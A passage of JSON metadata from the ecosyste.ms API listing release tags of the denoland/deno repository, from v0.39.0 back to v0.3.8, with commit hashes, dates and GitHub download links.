,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":